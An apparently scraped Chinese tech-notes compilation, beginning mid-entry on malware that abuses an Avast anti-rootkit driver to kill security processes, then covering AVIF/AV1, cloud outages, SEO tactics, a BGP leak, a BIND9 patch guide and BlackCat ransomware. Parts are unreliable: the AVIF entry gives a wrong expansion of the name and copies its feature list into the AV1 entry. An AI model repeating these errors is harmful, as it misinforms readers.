的恶意程序,首先在受害者计算机上部署 Avast 杀软的 Anti-Rootkit 驱动程序组件 aswArPot.sys,然后投放另一个合法的内核驱动程序,命名为 ntfs.bin。 在完成驱动程序部署后,恶意软件利用系统工具 sc.exe 创建名为 aswArPot.sys 的服务,将 ntfs.bin 注册到系统中。随后 kill-floor.exe 便会扫描受害者计算机上的进程列表,通过调用 DeviceIoControl API 并发送特定的 IOCTL 代码终止受害者设备防火墙、EDR 端点安全防护进程。 安全公司表示,黑客这种攻击手法主要借用了合法的安全软件组件,因此能够绕过传统的安全防护措施,给安全防护带来了新的挑战。 #### AVIF 和 AV1 是什么格式,有什么优缺点 AVIF 和 AV1 简介 AVIF(Audio Video Interleave Frame)是一种基于AV1编解码器的图像格式,被设计用于在互联网上传输高分辨率图像。AVIF是一种优化的图像格式,旨在使我们的图像更小,同时保持相同的质量(无损),AVIF的文件扩展名是 .avif。 AV1是一种先进的视频编解码技术,由开放媒体联盟(AOMedia)主导开发,它的目标是提供一种免版权费的视频编解码技术,以取代传统的H.264和H.265。 AVIF 和 AV1 的优缺点 AVIF 优点: 压缩效率高:AVIF的压缩效率比JPEG更高,可以在相同质量的前提下,使得AVIF文件大小是JPEG文件的35%左右。 画面细节好:相对于JPEG,AVIF无论是在压缩率上还是在生态上都有着不可小觑的实力,画面细节更好。 支持更多现代功能:AVIF支持全分辨率的10位和12位颜色以及HDR,支持8、10和12位的颜色深度、胶片颗粒保留、PNG图像的透明度以及GIF格式的动画。 免版税:AVIF是免费且开源的,没有任何授权费用。 缺点: 兼容性有待提高:尽管大部分主流浏览器都支持AVIF格式,但是部分浏览器尚不支持AVIF,比如Microsoft Edge浏览器。 需要特定的软件支持:虽然可以通过Microsoft照片软件查看AVIF格式文件,但是在某些设备上可能无法直接查看。 AV1 优点: 免版税:AV1是一种开源的视频编解码技术,没有任何授权费用1。 支持更多现代功能:AV1支持全分辨率的10位和12位颜色以及HDR,支持8、10和12位的颜色深度、胶片颗粒保留、PNG图像的透明度以及GIF格式的动画4。 兼容性强:AV1得到了Google、Amazon、Netflix、Microsoft等公司的支持,因此在兼容性方面有很大优势。 缺点: 学习成本高:AV1是一种相对复杂的技术,需要专业的知识才能理解和使用。 硬件支持不足:虽然大部分主流设备都支持AV1,但是在一些老旧的设备上可能无法播放AV1格式的视频。 总的来说,AVIF和AV1都是优秀的图像和视频编解码技术,各有各的优点和缺点。在实际应用中,需要根据具体的需求和环境来选择合适的格式。 #### AWS 东京数据中心遭遇故障:众多银行、股票交易商和电信公司访问中断 AWS位于东京的AP-NORTHEAST-1地区遭遇了6个小时的性能不是最理想的现象。这个云巨头的状态报告显示,由于“核心网络设备出现故障”,AWS Direct Connect混合云网络服务无法正常连接到该地区的资源。截至太平洋标准时9月1日下午15点30分即东京上午7点30分,AWS表示正在努力恢复服务。两个小时后,该公司已确定虚拟专用网络(VPN)流量仍在正常传输,但无法给出服务恢复的大概时间。到太平洋标准时21点00分即东京中午,用户们被告知部分恢复的迹象已变得很明显。这起事件在21点42分宣告结束,离首次观察到数据包丢失过去了六个多小时。AWS的最新公告稍微提到了这起事件的根源,声称原因是“损失了几个核心网络设备,这些核心网络设备用于将Direct Connect网络流量连接到AP-NORTHEAST-1地区的所有可用区。”AWS没有解释它所说的“损失”到底是什么意思。不管发生了什么,“问题现已得到解决,服务恢复正常运行。”这起事件再次表明,一旦AWS出现了故障,客户跟着遭殃;日本媒体报道众多银行、支付系统、股票交易商及其他公司遭到了中断。 #### AWS云服务器挂了 11 个小时:因多处光缆被挖断 截止到下午1:48,AWS官方公告表示已经完全恢复,故障已解决: 凌晨2点开始,AWS北京区域出现大面积的瘫痪: AWS公告表示:在CN-NORTH-1区域有多处光纤在昨晚的道路作业中被挖断,导致该区域的第一个可用区中EC2实例不能访问同时不能在整个CN-NORTH-1区域中新建EC2实例。 13:00状态: 14:30状态: 15:00状态: Amazon Elastic Compute Cloud (Beijing): 14:56更新: Amazon Elastic Load Balancing (Beijing): Amazon ElastiCache (Beijing) : Auto Scaling (Beijing): AWS Lambda (Beijing) AWS中国区目前运营方包括光环新网、西云数据,据光环新网《2018年年度报告》显示:2018年云计算业务收入 43.8 亿元,实现营业利润 4.7 亿元。 据IDC咨询的数据显示,目前AWS在中国区的市场份额位列第四,市场份额6.4%。 源于:公众号云头条 #### AWS带头,公网IPv4 地址将面临涨价收费 8 月 1 日消息,亚马逊旗下云服务 AWS 宣布自 2024 年 2 月 1 日开始,向使用公共 IPv4 的组织收取费用,每个 IP 地址每小时 0.005 美元。 AWS 表示在过去 5 年时间里,购买单个 IPv4 地址的成本增加了 300% 以上,因此选择通过收费来维持运营成本。 这项调整对拥有大量云工作负载的企业来说,会带来重大的影响。AWS 已经推荐客户尽快迁移到 IPv6,避免每月账单大幅增加。 AWS 表示本次收费适用于包括 Elastic Kubernetes Service(EKS)节点、Relational Database Service(RDS)数据库实例和 Amazon Elastic Compute Cloud(Amazon EC2)等所有 AWS 服务。 亚马逊带这个头的话,国内云服务商可能会跟进,这网络运营成本可能要提高很多了呀。 #### AWS被攻击了:DNS 被 DDoS 攻击了 15 个小时 AWS警告客户,分布式攻击严重阻碍网络连接,殃及众多网站和应用软件。 云巨头AWS遭到攻击后,今天其部分系统实际上断网。 由于这次持续的故障,不走运的网民间歇性无法访问依赖AWS的诸多网站及其他在线服务。 据亚马逊的支持工作人员声称,具体来说,AWS DNS服务器受到了分布式拒绝服务(DDoS)攻击,恶意者企图向系统发送庞大的垃圾网络流量,导致服务无法访问。 就这次攻击而言,亚马逊的DNS系统被潮水般的数据包阻塞,作为缓解措施的一部分,其中一些合法的域名查询被无意中丢弃。这意味着众多网站和应用软件试图联系亚马逊托管的后端系统(比如S3存储桶)可能以失败告终,从而导致用户看到错误消息或空白页面。 比如说,如果你的Web应用程序或软件试图与你在mycloudydata.s3.amazonaws.com处的存储桶进行联系,将这个人可读的地址转换成IP地址的DNS查询可能无法传送到亚马逊,可能导致你的代码无法正常运行。一种变通方法是,将存储桶的区域插入到地址中,比如:mycloudydata.s3.us-east-2.amazonaws.com,我们被告知该地址应该可以正确解析。来自服务正常运行时候的缓存DNS查询显然仍可以正常处理。 这次局部故障始于大概10个小时前,即美国东海岸时间09:00左右。这影响的不仅仅是S3,还会妨碍客户连接到依赖外部DNS查询的亚马逊服务,比如亚马逊关系数据库服务(RDS)、简单队列服务(SQS)、CloudFront、弹性计算云(EC2)和弹性负载均衡(ELB)。无数网站和应用软件依赖这些服务以处理访客、处理客户信息。 AWS状态页面上,说明显示如下: 间歇性的DNS解析错误 用户报告Route 53和我们的外部DNS提供商出现偶尔的DNS解析错误,我们正展开调查。我们正在积极努力解决问题。 同时,今天早些时候,AWS客户表示,他们从支持工作人员处接到了以下说明,表明这家美国公司正遭到DDoS网络攻击: 我们正在调查有关间歇性的DNS解析错误的报告。AWS DNS服务器目前受到了DDoS攻击。 我们的DDoS缓解措施在化解绝大部分的攻击流量,但是这些缓解措施目前也将一些合法的客户查询标为攻击流量。 我们正在追查攻击的源头以消灭攻击,还积极采取另外的缓解措施。受此事件影响的亚马逊S3客户可以更新访问S3的客户软件的配置,以指定请求缓解影响时其存储桶所在的特定区域。 比如说,客户为其在US-WEST-2区域的存储桶指定“mybucket.s3.us-west-2.amazonaws.com”而不是,指定“mybucket.s3.amazonaws.com”。如果你使用AWS开发工具包,作为亚马逊S3客户软件配置的一部分,你可以指定区域,确保你的请求使用该区域特有的端点名称。DNS解析问题还间歇性地影响需要公共DNS解析的其他AWS服务端点,比如ELB、RDS和EC2。 大概一小时前,亚马逊云支持团队发推文:“用户报告Route 53和我们的外部DNS提供商出现间歇性的DNS解析错误,我们正展开调查。” 北京时间中午12:30, AWS发布公告表示问题已解决: 另一家云服务提供商Digital Ocean也记述了自家系统遭到DNS攻击的影响: #### AWS(日本)故障影响多家加密货币交易所! 昨日,AWS的故障影响了多家加密货币交易所的交易、取款和存款。币安首席执行官赵长鹏在Twitter上吐槽该问题,特别指出他的交易所“几乎陷入停顿”,员工们正在竭力解决问题。赵长鹏补充道,该问题影响了“少数用户”的余额同步。币安尚未发布官方声明,目前尚不清楚该问题是否与之前报告的以太坊拥塞问题有关。火币全球也受到了AWS故障的影响。它特别指出,“一些用户的登录和交易受到影响”,但向用户保证账户余额并没有受到影响。库币也报告了AWS故障引起的问题,特别指出该网站上的存款和取款出现了延迟。然而,其交易服务并没有受到影响。BitMax也留意到了AWS的问题,表示它将在48小时内解决问题。最后,FTX首席执行官Sam Bankman-Fried报告了AWS故障,但指出该交易所已恢复正常功能。他在Twitter上写道:“只要AWS保持正常运转,我们就没有问题。如果有AWS的其他问题,我们会发布最新消息。”与此同时,Kraken报告其期货平台和USDC资金门户出现了性能下降的情况。然而,它没有提到AWS在那些故障中是否难咎其责。据AWS声称,太平洋标准时间上午7点09分,亚马逊弹性计算云(东京)开始出现了问题,当时系统开始过热。到中午11点26分,那些问题基本上已得到解决。 #### Azure 挂了:云服务被雷击垮了;已持续 22 个小时 微软公司的Azure公共云近日算是被真正的云搞垮了,因为该公司将周二导致美国用户无法正常使用几项服务的一起故障归咎于“恶劣天气”。微软表示,位于得克萨斯州的美国中南部数据中心遭到了雷电风暴,结果散热系统出现了故障,迫使该公司关闭了许多服务器和系统,以防遭到更严重的损坏。微软在Azure状态页面上的一份声明中表示:“美国中南部的数据中心附近发生了一起恶劣的天气事件,包括雷击。这导致电源电压升高,从而影响了散热系统。确保数据和硬件完整性的自动化数据中心程序立即生效,关键硬件进入了有条不紊的断电过程。”开始故障时Azure状态页面甚至一度无法打开:散热系统是现代数据中心的一个重要组成部分,因为散热系统是消除在一个封闭的地方紧密堆叠在一起的成千上万台服务器产生的高温所必不可少的。简而言之,如果这个系统出了故障,所有系统都将随之停运。因此,如果温度上升到超过安全水平,像微软这样的公司落实了自动关闭数据中心机器的程序。这是保护微软数据中心投资的重要措施,但是对云客户来说也带来了很大的不便。微软提到的恶劣天气很可能与飓风戈登有关,这场1级风暴目前正在得克萨斯州海岸的附近兜转。微软表示,这起故障已影响了许多Azure云服务,包括Visual Studio Team服务。停运的其他服务包括Azure Active Directory身份管理服务和基于云的生产力套件Office 365。Visual Studio Team Services小组补充道:“由于一些内部基础设施依赖Azure云服务,美国中南部地区以外的企业组织的客户所用的持续集成/持续交付(CI/CD)工作流程和仪表板也可能受到了影响。”专家们表示,这一事件向使用云服务的企业组织敲响了警钟:说到运行云端的关键工作负载,只有傻瓜才会依赖单单一家提供商。Mimecast有限公司的网络弹性专家彼得•班纳姆(Pete Banham)说:“今天Azure发生的事件再一次清楚地表明,企业组织需要做好自己的冗余机制,而不是依靠单单一家提供商。”Constellation研究公司的首席分析师兼副总裁霍尔格•米勒(Holger Mueller)表示,不过,该事件也给了希望避免将来发生此类事件的微软一个深刻的教训。米勒说:“这次事件深刻地提醒人们,即使对于像微软这等规模的IaaS提供商来说,要保持数据中心正常运行有多难。闪电、洪水、飓风、大雪和暴雨都会影响数据中心的可用性。所以一个关键的问题是,微软从中汲取了什么教训?它如何在将来能避免类似的故障?这给了希望加强云基础设施的公司一个深刻的教训。”在发布的最新消息中,微软表示它在努力使所有受影响的服务重新上线,不过截止本文发稿时,这项工作显然仍在进行之中。微软表示:“工程师已成功地恢复了数据中心的电源。此外,工程师已恢复了大部分受影响的网络设备。虽然一些服务开始出现了恢复如初的迹象,但抢救工作仍在进行之中。” #### b2b推广新手教学 B2B推广工业用品推广,首先定位行业产品关键词,分析产品用户搜索习惯,使用百度推广工具,找到关键词然后写文章。然后百度艾瑞网排名可以排名前100名B2B网站。注册网站账号与完善B2B网站资料。一、B2B推广基础资料准备B2B推广首先要准备的资料公司营业执照,法人身份证,正反面。公司介绍嵌入核心关键词简洁版,注册资料做成文本。方便以后使用工具的时候批量注册,直接导入,不用一个个去注册。二、B2B推广批量注册站点批量注册站点,电脑上面都可以装一个火狐浏览器,或者是装萝卜小生辅助工具,用它来注册很快速度。同时也可以用它来快速发布产品信息。整理公司:形象图片,logo图片,法人身份证,正反面图片,公司介绍,企业信息,营业执照等图片信息,打包在一个文件夹里面电子版基础资料,方便批量快速注册。​这些基础资料准备好了后,每个操作员至少分配50个站点去注册,一般来说,每人每天注册并完善20个站点资料,在三天时间内,完成每人50个站点的注册。把站点分配给操作员,让他们完善资料,比如营业范围,别用工商部门核发的营业范围,而是放主营产品,并且是那些高指数的主营产品核心词。第三我们做关键词表和标题素材关键词百度搜索高可以从左到右去排序。比如说美国格朗 国际品质 美国格朗 价格大打折扣,质量不打折。做好后面的长发尾关键词,增加搜索。前面加上地名和城名。第四就是内容素材。内容素材主要内容第一段可以加标题加电话,行业乱象,可以百度一下新闻,公司介绍。核心卖点客户买了有什么好处,技术参数,客户见证可以拿客户好评,直接复制过来。前面五大部分,每个部分写几个文本。比如说行业乱象,你可以写十个文本,每个文本大概两百个字左右。标题,公司介绍行业乱象,产品卖点,客户见证,客户好评,组合成一篇文章,这样的发布信息文章内容不重复。一篇文章控制的字数是在1200个字左右。首段一定要控制在140字以内,并且,首段嵌入关键词、联系方式。每个版本的内容中,最好采用小标题,把核心关键词位置预留出来,把卖点布局上去1、产品首图,图片一定要显眼,带联系方式2、产品高清图:什么其它因素都没有,干净的一张图片3、场景图。或者是产品在客户那里使用的场景,或者是工厂生产现场等场景。甚至可以从阿里、淘宝等同行卖家截取买家秀图片,当然,把标志去掉4、联系方式图片:在文案中,一定要把这些图片包含联系人,电话,座机,地址,你潜在的买家,既了解了你的产品,又能非常便捷的找到你六、其它注意事项文案中要时不时的出现联系方式,而不只是系统设置中那些显示联系方式的地方才有。可以加电话在标题或是首段在开始阶段,不管站点好坏,挨个先发5篇,并记录下来这些站点信息的URL地址。便于后面统计、分析,哪些站点收录如何等。不用多了,当操作员一旦熟悉了B2B信息发布,这些细节做好了,那么,半个月左右,信息就能霸屏百度等搜索引擎。只有收录和排名上来,才会有大量的询盘进来。至于询盘进来后,能不能成交,那就不是信息的事了,是接单业务员业务能力的问题了在做信息的时候,如果遇到可以设置关键词,或者是内容标签的地方,那一定要设置,并且,文章标题是什么词,那标签就设置成什么词,这叫一致性。标题关键词、内容嵌入关键词、标签关键词,三者一致。再就是图片,要是可以设置ALT标签,也尽量用该篇文章的关键词命名。当然,还会有很多细节方面需要做的。先把这些做好,接下来就是具体站点具体分析了,这个不是三言两语能说得清的。慢慢站点和信息做得多了,遇到的问题会更多,再具体解决。让团队,可劲去执行半个月,每天上报当天发布的数量,一定要有报表,也就是记录发布信息的URL地址。隔三四天,查询收录情况。当然,如果使用力点B2B推广4合1软件,就没那么费劲,边操作,就边记录下来信息地址了,无需再上报地址,在软件中就可以直接查询工作进度。 #### B2B网站优化SEO实战经验分享 (配图:环境在艰苦也要学习SEO) 9月中旬接手了“江西现代服务交易网”这个b2b网站,网站到目前上线已经半年了。 大家都知道,2013年是百度规则大改,seo业界可谓艰难的一年啊!百度石榴算法,原创火星的计划,绿萝算法的推出让站长们胆颤心惊,近乎苛刻的外链审核都似乎在告诉我们外链为王的时代已经过去,而大家强调的以用户点击率评判外链质量的好坏时常让我想到是先有鸡还是先有蛋的问题。 不管怎么样,如果你觉得力不从心,那是因为seoer思维还没有转变过来,抑或说大家都都没有一个系统普遍的seo成功优化方案。对于以上,相信广大seoer都在探索之中,包括我现在负责的“江西现代服务交易网”这个b2b站点,目前仍然在百度的算法不断更新中seo收录仍然非常不正常,表现出索引量近一万,而site值在1000-5000之间巨大的波动。 一、网站9月中旬跟网站现在seo情况 废话说了这么多,切入正题,我是9月份中旬接手这个网站,通过对网站的分析发现,网站在初期seo存在以下不足: 1,网站收录9月中旬仅为147 由于之前负责网站的是另一个seoer,进一步了解到江西现代服务交易网这个B2B网站在上线前2个月收录都没什么动静,第三个月收录才陆陆续续上来,9月中旬的时候收录数量为147。 2,外链数量 外链到9月中旬的时候数量为1000左右,具体查询后,发现指向首页的链接太少,这也造成“江西现代服务交易网”这个关键词在100名以外的原因之一(后面还会提到别的原因)。此外,外链在广度和质量方面还有待提高。 3,关键词排名 网站权重为0,暂时无任何关键词排名。实则具体分析发现,网站核心关键词都没有确定,因此,在前期做的外链锚文本中,都是杂乱,分散。在确定以“现代服务业”为核心关键词后,对网站标题及网站首页添加了几处“现代服务业”关键词,以增加首页关键词密度。 4,内部结构 网站到10月20日的时候,收录为547,收录比率仅为3.65%。尽管,网站也许还在审核阶段,收录不可能很高,但是仍然可以通过采取一些手段增加网站的收录比率。21日通过对网站调整辅助导航(增加了指向首页的链接,从而提高网站权重,这也是造成“江西现代服务交易网”这个关键词上升不了的原因),更改网站文章内页模板标题,增加无关链接的nofollow标签等手段后,仅在4天后,网站收录出现一个大的提升,同比净增长142.92%。当然,在采取这些大的内部结构改动后,网站快照从隔日更新瞬间近半个月维持在10月21日。 这是之前文章内页的标题: 网站二级频道【展会信息】的大的标题竟然在文章内页中一起出现,造成文章标题“又臭又长”,影响收录。而这种情况恰恰出现在多个频道的内页中。 文章内页竟然没有出现“江西现代服务交易网”这个网站标题,正确的形式应该是“文章标题+栏目名称+网站标题”或者直接“文章标题+网站标题” 修改后: 由于在文章内页中缺少“江西现代服务交易网”的后缀标题,“江西现代服务交易网”这个关键词只存在首页及二级频道页面当中,在文章内页中增加后将大大提高网站与“江西现代服务交易网”这个关键词的相关性。要知道,网站名称都在百度找不到的话,意味着这个seo是做的多烂。 内部问题是发现后能得到技术人员的及时改进,这是比较开心的。网站在初期,由于网站主编跟我们seoer的目的不同,他为了填充数量而让编辑填充了大量的低质量的页面,这点在后期网站收录不佳后,问题得到了重视,因此,在一次会议后,调整了策略:减少量,注重质。不过,仍然还存在一些问题没有解决,比如企业黄页的伪静态问题。 二、目前seo情况: 在控制文章质量后,网站质量得到了有效改善,这点从pr可以提现。谷歌pr在12月7日更新,我们欣喜的看到江西现代服务交易网网站pr一下子从无到4,说明了我们工作中取得的一些进步。 1、收录和反链。 在12月2日索引量陡争7000多达到近一万后,site值就在2000-5000直接大的跳跃,反链更是在4000-300000直接波动,很多人说,看百度站长后台更加准确,相比站长工具,的确,百度站长平台就显得平稳多了,但是之前站长工具查询数据跟百度站长后台都是同步的,这也从另一个方面反映了百度算法更新对网站的影响。相关seoer从业人员,给我的建议是不要管,专心更新网站内容和外链,我想,也只有这种以不变应万变的方法了,并且也是最稳妥的。 百度站长后台索引量,目前近1万 百度站长后台外链 2,网站关键词排名 经过网站内部结构整改后,关键词排名一直在20几位,期间有几天上升到第10位维持了几天后又掉下来,中间有一天到第1位。也想不到别的好的办法,继续给网站做“江西现代服务交易网”的锚文本外链,以提升关键词的权重,终于,在12月4日上来了,并且稳稳第一位。 “现代服务业”:这个指数为200左右,竞争程度中等偏下,但是排在前面的几乎都是政府性网站,加上b2b网站首页的特效性,不能在很多地方放置“现代服务业”关键词,且为了用户体验性着想,没有好的栏目来添加“现代服务业”相关文章,给优化关键词方面带来了一定难度。截止到目前,“现代服务业”关键词出现主要在友情链接及博客,论坛当中,而且数量不多。(好吧,说到外链又是我的痛),关键词排名在30上下波动,排名最好的时候在24位。个人一直建议增加“现代服务业”栏目以供专门添加“现代服务业”相关文章,且为二级频道,辅助导航表现为“现代服务业->文章标题”,“现代服务业”直接链接到首页,为不影响首页版面,在首页头部或底部增加“现代服务业”关键词入口,可惜,由于沟通问题,技术一直没有重视及改善。 网站同时优化的还有“江西企业”“江西电商”“企业服务”“中小企业网”“江西企业名录”等关键词。由于本人seo经验的不足,精力,人力各方面的限制,这些关键词排名还不是很理想。其中,“企业服务”“中小企业网”在100名以外,江西企业”“江西电商”“江西企业名录”分别是53,12,28位。 seo心得分享 要问到seo技巧时,大师给我们的建议总是坚持好的原创文章更新,及努力创造高质量的外链。这虽然可以通用,但是,我们更希望的是能给我们一些做关键词排名的方法,进而少走一点弯路。这里我分享一些我从事seo以来的一些心得体会。 1、站内 由于自己曾经做过网站建设,懂得一些源代码,所以这方面的知识对我工作是一个帮助。在优化关键词排名时,尽量在首页增加关键词密度,2%-5%最好,能给我们外链建设减少不少工作,如果不能,就想方设法多做一些好的质量的锚文本外链吧。此外,我们很少接触到项目的初期建设,因此在网站架构方面很多时候都无能为力,比如增加优化专题,关键词布局啊甚至一些更大的改动,所以略过不提。 2、站外外链建设 外链建设是自己一直非常不擅长的,这也是做了这么久的外链才这么点成效的原因。但是仍然可以分享一些经验,哪怕失败的,防止你们多走弯路。 1)论坛。如今seo这个职业深入人心,对于管理论坛的人来说,恐避之不及。因此,论坛外链做起来那是精力花费非常多,效果却不好。有些论坛等级甚至到很高,也努力的发了几个热帖也因为你的一两个外链被管理员无情的永封。因此,论坛这块外链阵地算是没事耕种一下,不可花太多心思。当然,一些权重高的站长论坛如落伍,a5偶尔发一些引引蜘蛛还是不错的。 2)博客。新开博客发链接能快速收录的寥寥无几,哪怕是新浪这样曾经我们seoer公认的发外链的好地方。估计百度算法对新开博客收录审核严格了不少,但是,如果培养起来了,仍然是绝佳的发锚文本外链的地方。建议花心思培养。 3)分类信息发布网站。分类信息网站数量不少,收录的不多,同样是精力多,成效少。 4)B2B网站。权重高能带链接收录还好的B2B网站如今一个手指能数的出来,由于是跟我们网站行业性质相关,我们仍然没有放弃这一阵地。精力花费的也不少。 5) 问答。能带链接还能收录的问答网站有多少,我至今没收集到一个手指头的数量。问答删掉答案的严厉程度不亚于如今的百度百科。 6)其他。其他包括收藏夹,文库等等,自己可以去收集摸索。 以上都是失败的效果不好的经验,那么成功的经验呢?我做外链的过程中,越来越发现“分享”的原则,利用网络各种渠道,去不吝分享你的东西,收到的效果有时会出乎其外的好。分享的渠道目前比较有效的有: 1)投稿。这也是我一有时间就会去做的,目前在站长之家,a5,落伍同时投稿,数量不多,但是外链效果不错。一篇文章一般可以引来10条外链,去掉你外链copy你文章数量的人实在太多了,这也反映了如今seo界的一种不好的现象。因此,我现在要是转载别人的文章,如需附上网址,一定尊重。 2)资料分享,下载。百度文库如今审核很严,至今为止没有一篇通过的。但是360图书馆有一个很好的“来源”可以在发布文章时附上我们的网址,虽然比较隐秘,但是凭借360本身的影响力,图书馆人气很旺。我有一篇文章在其被转载了130多次,也因此被360图书馆加了精。此外,新浪爱问知识人资料下载,豆丁网也是不错的选择。下载的人不少,顺便宣传自己的网站。 3)社会化媒体。有人说,如今就是一个社会化媒体的时代,社会化媒体的本质也是“分享”,如今很火的有微博、微信,空间,由于精力有限,还没有往这方面做努力。建议有精力的朋友不可放弃这一阵地。 从“分享”原则可以看出,Seo变得比以前复杂多了,更多的往网络营销方面走了,借用我另一篇文章中的结语:一位合格是seoer,一位合格的seoer一定要懂用户体验、品牌建设、及外链的社会化。否则,seo将是死路一条。   #### Baidutrust超级SSL证书产品介绍 Baidu Trust是百度自有SSL证书品牌,提供全球可信的服务器验证、数据传输加密服务,双重加密算法,独有百度生态服务加持,可一键部署证书到BLB、CDN、BCH等产品,轻松获得可靠、安全的HTTPS服务。 详细介绍可下载PPT #### BGP重大泄漏:全球各地的数千个网络瘫痪 2021年4月16日晚间发生了一次严重的BGP路由泄漏事件,全球各地成千上万个大型网络和网站的连接纷纷中断。据消息人士声称,虽然BGP路由泄漏事件发生在沃达丰建在印度的自治网络(AS55410),但已影响到包括谷歌在内的众多美国公司。BGP泄漏导致引错路的流量激增13倍 昨天,思科的BGPMon发现互联网路由系统出现了不一致,这可能表明出现了某种BGP劫持活动:“前缀24.152.117.0/24通常由AS270497 RUTE MARIA DA CUNHA,BR宣告。”BGPMon发布的声明称:“但是从2021年4月16日15点07分01秒开始,同一个前缀ASN 55410(24.152.117.0/24)也由ASN 55410宣告。”Kentik的互联网分析主管Doug Madory进一步证实了这一发现结果,声称自治系统ASN 55410的入站流量激增了13倍。发生这种情况的原因是,网络错误地宣告它支持30000多个BGP前缀或路由,实际上并非如此,因而导致互联网将本不该通过该网络传输的流量发送到该网络。这个自治系统(AS55410)属于沃达丰印度有限公司。据Kentik的分析显示,包括谷歌在内的多家美国公司也受到这起事件的影响,该事件似乎从2021年4月16日的将近13点50分持续到了14点00分。BGP专家Anurag Bhatia进行了进一步的分析,确认了全球20000多个自治网络受到了该事件的影响。2万多个自治系统编号(ASN)受到这起BGP泄漏事件的影响,上图是其中一部分。BGP、BGP劫持和BGP泄漏是什么?  BGP(边界网关协议)是现代互联网得以正常运行的基础。它好比为互联网设有一套“邮政系统”,有助于将流量从一个(自治)网络重定向到另一个自治网络。互联网是网络中的网络;比如说,一个国家的用户想要访问另一个国家的网站,就要有一个系统,该系统知道在跨多个网络系统重定向用户时走哪几条路径。这类似通过来源和目的地之间的多个邮政支局投递信函。而这就是BGP的目的:在来源和目的地之间通过多条路径和多个系统,正确地引导互联网流量,从而确保互联网正常运行。BGP路由泄漏或劫持示意图但是BGP很脆弱,只要几个中间系统出现任何中断或异常,都有可能对许多系统产生持久的影响。互联网要正常运行,不同的设备(自治系统)会通告它们管理的IP前缀以及它们能够路由传输的流量。然而,这很大程度上是一种基于信任的体系,假设每个设备都如实通告。考虑到互联网有大规模互连的特性,因此很难确保网络上的每一个设备都如实通告。某个恶意实体设法向其他路由器“错误地通告”它们拥有一组特定的IP地址、实际上并非如此,就会发生BGP路由劫持。一旦出现这种情况,就会造成混乱。这种路由混乱会在互联网上造成很大的麻烦,并导致延迟、交通拥堵或全面瘫痪。但是BGP路由泄漏类似BGP路由劫持,只是后者更特指发生恶意活动的情况,而路由泄漏很有可能是偶发性的。无论是BGP路由泄漏还是BGP劫持,自治系统(AS)都会宣告它知道“如何”引导发送到某些目的地(AS)的流量、实际上它并不知道,或者宣告它知道将这些流量发送到“何处”。这可能导致用户被引到性能差强人意的互联网路由上,或者在恶意劫持的情况下,完全导致中断,有可能充当窃听或流量分析活动的跳板。 参考资料:https://www.bleepingcomputer.com/news/security/major-bgp-leak-disrupts-thousands-of-networks-globally/ #### BIND9高危漏洞解决方案 问题是什么? 简单来说,这是一个严重的网络安全问题。 涉事软件:BIND9,这是全球范围内使用最广泛的DNS服务器软件。绝大多数互联网域名解析服务都依赖它。 问题核心:BIND9软件中存在3个高危漏洞(CVE-2025-8677, CVE-2025-40778, CVE-2025-40780)。 漏洞危害: 服务中断:攻击者可以利用这些漏洞,向你的DNS服务器发送特制的恶意数据包,导致DNS服务崩溃,无法提供域名解析服务。这意味着用户无法通过域名访问你的网站或服务。 缓存污染:攻击者可以将错误的域名解析结果注入你的DNS服务器缓存,从而将用户引导到恶意的网站(例如钓鱼网站),造成数据泄露或其他安全风险。 攻击方式:远程、未授权即可利用,门槛较低,风险很高。 受影响版本 如果你的BIND9版本处于以下范围,则受到漏洞影响: 9.18.0 - 9.18.39 9.20.0 - 9.20.13 9.21.0 - 9.21.12 9.18.11-S1 - 9.18.39-S1 9.20.9-S1 - 9.20.13-S1 如何解决? 解决方案是立即升级你的BIND9软件到已修复漏洞的安全版本。 修复版本如下: 9.18.41 9.20.15 9.21.14 9.18.41-S1 9.20.15-S1 操作步骤建议 确认当前版本:在服务器上运行命令:named -v 或 bind9 -v,查看你当前的BIND9版本号。 规划升级: 如果版本在受影响范围内,应立即安排升级。 选择与你现在主版本号对应的修复版本进行升级(例如,如果你在用9.18.30,就升级到9.18.41)。 执行升级: 通过官方源升级(推荐):如果你之前是通过系统包管理器(如 yum, apt, dnf)安装的,可以直接使用包管理器升级。 Ubuntu/Debian: sudo apt update && sudo apt upgrade bind9 CentOS/RHEL/Fedora: sudo yum update bind 或 sudo dnf upgrade bind 编译安装:如果你之前是手动编译安装的,需要去ISC官网下载新版源码包重新编译安装。 下载地址:https://www.isc.org/downloads/ 重启服务:升级完成后,必须重启BIND9服务以使更新生效。 sudo systemctl restart named 或 sudo systemctl restart bind9 验证: 再次运行 named -v 确认版本已更新。 检查DNS服务是否正常解析,并查看系统日志有无错误信息。 临时缓解措施(如果无法立即升级) 如果因为某些原因无法立即升级,可以考虑: 通过网络防火墙或安全组策略,严格限制向DNS服务器(端口53)发送查询的客户端源IP地址,只允许可信的解析器或用户访问。但这并不能完全消除风险,升级才是根本解决办法。 这是一个需要紧急处理的高危漏洞。请立即检查你的DNS服务器版本,并尽快升级到已修复的安全版本。 #### Bing 必应搜索在中国内地暂停搜索 30 天 12 月 17 日消息,昨天微软 Bing 搜索网站部分区域出现暂时无法打开的情况。 随后微软 Bing 官方发布声明称,根据中华人民共和国法律,Bing 在中国内地暂停“搜索自动建议”功能 30 天。 微软 Bing 表示,根据中华人民共和国法律,Bing 中国已经被政府有关部门要求在中国内地暂停“搜索自动建议”功能 30 天。作为全球性搜索平台,Bing 将持续致力于尊重法治与用户获取信息的权利,在遵守法律的前提下最大限度地帮助客户寻找所需信息。 #### BlackCat黑客团队简介 BlackCat,也被称为ALPHV,是一个知名的黑客团队,他们以其高度定制的功能集和Rust编写的恶意软件locker而闻名。该团队最初成立于2020年,当时名为“DarkSide”,后来改名为“BlackMatter”,在2021年中旬被安全公司Emsisoft联合警方成功破获,不过2021年底该团队再度复出,改称“BlackCat”。 BlackCat团队的勒索软件包括许多先进的技术特性,这些特性使它与大多数勒索软件的操作不同,包括恶意软件完全使用命令行、人工操作和适应力强、以及它使用不同加密程序,在设备之间传播,关闭虚拟机,甚至擦除它们的快照以防止恢复。 此外,BlackCat团队的勒索软件还允许自定义文件扩展名、赎金说明、加密模式、隐藏文件夹/文件/扩展,以及自动终止服务和进程,因此受到犯罪分子的格外青睐。 值得注意的是,BlackCat团队的活动并不局限于勒索软件,他们还曾在2022年7月攻击了万代南梦宫,并声称已窃取了部分敏感信息。 总的来说,BlackCat团队以其高度定制化的勒索软件和强大的技术实力在黑客界有着较高的知名度和影响力。 #### boce:推荐一家不错的在线网页测速网站 之前有介绍过17测和站长之家测速工具,不过主机吧最近发现一家更好用的测速网站。 地址:https://www.boce.com/ 